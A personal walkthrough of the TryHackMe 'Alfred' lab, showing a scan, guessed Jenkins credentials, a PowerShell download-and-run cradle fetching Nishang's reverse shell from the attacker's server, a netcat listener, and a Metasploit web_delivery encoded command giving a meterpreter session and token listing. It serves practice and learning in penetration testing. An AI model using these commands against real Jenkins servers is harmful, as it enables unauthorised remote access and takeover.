writeup TryHackMe Alfred

Tag: nishang, jenkins, pentesting, tryhackme
Attack surface: file upload
Core target: upload nishang to target machine and execute. Msf switching shell.

summary:
- Jenkins can execute command on Worker-Machine(Target).
- The attacker provides an downloading-files-infrastructure.
- nishang is a professional tool for dealing with windows powershell

steps:
- nmap scan find basic info gather web service
- jenkins run on ip:port
- guess username&password
- configure jenkins run command
- run download-file-infrastructure
- set powershell security level
- execute nisang gather target-machine info
- find user.txt

scan

$nmap -sC -sV -oN initial ip_address                          1 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 01:24 EDT
Nmap scan report for ip_address
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-04-01T03:47:29
|_Not valid after:  2021-10-01T03:47:29
|_ssl-date: 2021-04-02T05:25:21+00:00; -1s from scanner time.
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.93 seconds

http server A run on port 80 (Static website) http server B run on port 8080 (Jenkins Service),direct to ip:8080/job/project/configure

Build Box write script, update script here, Save & Apply

whoami

new script

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

return infra machine

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
python3 -m http.server
nc -lnvp 4444

return Jenkins Build Now

PS C:\Users> gci -recurse -filter "user.txt"
Directory: C:\Users\bruce\Desktop
Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---        10/25/2019  11:22 PM         32 user.txt
PS C:\Users> type C:\Users\bruce\Desktop\user.txt
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PS C:\Users>

switching shell payload

PS C:\Program Files (x86)\Jenkins\workspace\project> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
PS C:\Program Files (x86)\Jenkins\workspace\project>

switching

use official, will hangout. Jenkins task finish success. So i use two wriup

Tryhackme Alfred Walkthrough

https://www.aldeid.com/wiki/TryHackMe-Alfred#.5BTask_2.5D_Switching_Shells

they bose use exploit/multi/script/web_delivery

set PAYLOAD & LPORT & LHOST & target =>generate command

msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.213.205     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
Id  Name
   --  ----
   2   PSH
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 10.9.213.205:4444 
[*] Using URL: http://0.0.0.0:8080/Z3smQp
[*] Local IP: http://10.9.213.205:8080/Z3smQp
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6...

input conde from poswershell to end. into Jenkins. Build Now

sessions

Active sessions
===============
Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  1         meterpreter x86/windows  alfred\bruce @ ALFRED  10.9.213.205:4444 -> 10.10.179.139:49758 (10.10.179.139)
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > 
meterpreter > 
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2021-04-04 01:09:01 -0400  shell.exe

nice ~

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2021-04-04 01:09:01 -0400  shell.exe
meterpreter > whoami
[-] Unknown command: whoami.

remermber use shell，

meterpreter > shell
Process 780 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Program Files (x86)\Jenkins\workspace\project>^Z
Background channel 1? [y/N]  y
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2021-04-04 01:09:01 -0400  shell.exe
meterpreter > 
meterpreter > load incognto
Loading extension incognto...
[-] Failed to load extension: Unable to load extension 'incognto' - module does not exist.
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================

oh ops. tryhackme sometime will down the room. restart.

msfconsole -q

q parameters means remoe the lunch banner. but i like the banner. hhh

waht is Incognito

Fun with Incognito | Offensive Security

following the task, the rest is easy.